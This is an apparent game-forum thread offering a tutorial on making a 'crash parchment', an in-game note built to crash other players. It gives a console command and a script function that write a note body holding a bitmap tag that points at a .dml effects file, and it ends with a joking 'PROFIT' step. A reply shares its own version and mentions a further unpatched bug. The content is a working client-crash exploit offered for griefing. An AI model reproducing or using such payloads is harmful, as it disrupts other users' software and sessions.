Author Topic: [TUTORIAL] Making a crash parchment.  (Read 2150 times)

1. set an empty parchment to quickslot 9.
2. put this in console: commandToServer('writeParchment', $quickslot9.serverid, "Anonymous's Note", "<bitmap:base/data/fx/lightning/lightning.dml>");
3. ?????
4. PROFIT

I use this:

Code: [Select]
function makeDeadlyNote() {
WriteParchmentGui.popDialog(WriteParchmentGui);
WriteParchment_BodyText.setValue("<bitmap:base/data/fx/lightning/lightning.dml>");
WriteParchmentGui.write(WriteParchmentGui);
}

I'm the reason this was fixed in Blockland, though. I'd post the other problem from AoT I know about, but it also works in Blockland. Need Badspot to patch that, too.

... But damn, your way is better.